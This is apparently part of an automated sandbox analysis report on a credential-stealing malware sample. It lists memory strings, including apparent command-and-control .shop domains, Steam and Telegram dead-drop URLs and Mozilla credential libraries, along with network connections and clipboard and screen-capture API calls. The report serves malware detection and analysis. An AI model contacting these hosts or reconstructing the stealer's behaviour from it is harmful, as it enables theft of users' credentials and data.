Source: FHCAEG.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://genedjestytw.shop/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://genedjestytw.shop/-
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://genedjestytw.shop/api
Source: RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://genedjestytw.shop/apiH
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://genedjestytw.shop/apiT
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steamp?
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: KFIJJE.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://metallygaricwo.shop//
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://milldymarskwom.shop/2
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://milldymarskwom.shop/api
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://milldymarskwom.shop/e
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://puredoffustow.shop/X
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://puredoffustow.shop/api
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://puredoffustow.shop/api9
Source: RegAsm.exe, 00000009.00000002.2434535586.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://questionmwq.shop/api
Source: RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quotamkdsdqo.shop/
Source: RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://quotamkdsdqo.shop/api
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.n
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/$
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/O
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997804188698~
Source: file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.c
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: KJJJKF.3.dr	String found in binary or memory: https://support.mozilla.org
Source: KJJJKF.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KJJJKF.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: DBFIEH.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: DBFIEH.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhellosqlp.dllMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FHCAEG.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: FHCAEG.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recap
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.2388095600.0000000019E6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: KJJJKF.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.62:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.61:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.75.242:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.192.105:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49776 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00432D80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00432D80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 391680
Source: BAAEHDBFID.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 333824
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 333824

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

